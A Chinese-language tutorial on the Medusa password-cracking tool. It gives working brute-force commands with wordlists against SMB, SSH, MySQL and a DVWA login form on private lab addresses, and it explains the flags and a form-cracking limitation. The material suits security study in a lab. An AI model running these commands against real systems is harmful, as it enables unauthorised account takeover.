Medusa和hydra一樣,同樣屬於在線密碼破解工具。不同的是,medusa 的穩定性相較於 hydra 要好很多。但是也有缺陷。它的支持模塊要比 hydra 少很多,也不支持 rdp 服務協議。同時,它的表單破解也存在着問題。但是不論什么工具,我們都應取其精華,善於利用。下面讓我們來看看,如何使用它。
首先,我們在終端輸入命令,查看medusa所支持的模塊。
medusa -d
我們可以看到,它支持多達20幾種的模塊。
現在我以破解Windows的smb來做關於Windows密碼破解的演示。輸入命令:
medusa -M smbnt -h 192.168.1.100 -u Eternal -P pass.lst -e ns -F -v 3
-M: 表示你要破解的類型。
-h:目標機器地址。
-u:用戶名。
-e : 嘗試空密碼。
-F:破解成功后立即停止破解。
-v:顯示破解過程。
接着,讓我們來嘗試破解 Linux 的ssh服務密碼。輸入命令:
medusa -M ssh -h 192.168.30.128 -u root -P pass.lst -e ns -F
我們再來破解下該服務器上跑的數據庫密碼。輸入命令:
medusa -M mysql -h 192.168.30.128 -e ns -F -u root -P pass.lst
我們可以看到,密碼很快就被破解。這里用的是空密碼。
最后我們來個表單破解還是以dvwa為例。
破解表單登錄密碼我們要用到web-form 這個模塊。如果你不知道該模塊如何使用,我們可以輸入以下命令來進行查看。
medusa -M web-form -q
-q: 查詢的意思。
下面開始破解。輸入命令:
medusa -h 192.168.30.128 -u admin -P pass.lst -M web-form -m FORM:”dvwa/login.php” -m DENY-SIGNAL:”login.php” -m FORM-DATA:”post?user=username&pass=password&Login=Login”
當我們回車,我們會發現有報錯,密碼並未被成功破解。這是因為medusa本身存在的表單破解缺陷導致的。它不支持正確特征碼的驗證,只支持錯誤的。所以,導致 login.php 和前面的 login.php 起沖突。